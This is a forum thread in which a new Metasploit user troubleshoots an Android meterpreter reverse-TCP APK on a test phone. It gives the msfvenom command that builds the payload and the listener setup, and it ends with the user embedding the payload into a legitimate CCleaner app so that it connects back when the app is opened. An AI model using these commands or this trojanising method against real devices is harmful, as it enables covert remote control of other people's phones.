reverse_tcp not working on android 8.1

[B4dger]

Hi

I'm reasonably new to using metasploit and can create a .apk with reverse shell without any issues but when I upload it on my test android running 8.1, it does not open a connection. It lets me install it but gives no option to open and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application but still nothing. When I bound it to an original application, the app opened and the game worked but no connection was created. I have gave the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong?

 

Much appreciated...

[digininja]

Have you tried monitoring traffic from the phone to see if it tries to reach out?

Can the phone definitely see the Metasploit listener? i.e. is there any NAT'ing or firewalls in the way?

[B4dger]

Thanks for your reply.

Yeah. Used wireshark to monitor my PC for any attempted connection on port 4001 that I configured in the apk and listener and nothing is coming through. I also monitored the android phone and nothing on that end either. I have screen shots but unsure how to upload them.

This is the list of commands in case they are any help:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4001 R > /root/evil.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10088 bytes

msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.17
LHOST => 192.168.0.17
msf exploit(multi/handler) > set LPORT 4001
LPORT => 4001
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.17:4001

 

[digininja]

Try browsing to 192.168.0.17:4001 from the phone and watch for traffic, see if any traffic can get out to it.

 

And to upload images, there is a file attachment feature at the bottom of the editor.

[B4dger]

Nothings getting through. Tried running a quick Apache server to double check it and not connecting to that either. 

 

I can't seem to figure out how to add them from there, only give an option to add from URL or existing attachment.

[digininja]

For attachments, did you try this?

 

and if nothing is getting through then you've probably messed networking up somehow, check routing and firewalls. Try a simple netcat listener on port 80 and browse to that to see if that gets through.

[B4dger]

Will check in a couple of hours when I get back and let you know how it goes.

 

Appreciate your help.

[digininja]

just a warning, as a new member you are limited to 5 posts a day so make sure your next one is a good one as you won't be able to do another till tomorrow.

[B4dger]

Thanks. I worked it out, in a way. After banging my head against the wall for another 5 or 6 hours 😂. I don't know why the regular meterpreter.apk wouldn't run but I got it to work by disassembling the CCleaner.apk I downloaded and manually embedding the code in it, installed it on my droid and after many many attempts got it right and meterpreter session now connects when the CCleaner app is opened.
 

Thanks for your help, certainly helped me in troubleshooting what was wrong.

 

[digininja]

Glad you fixed it.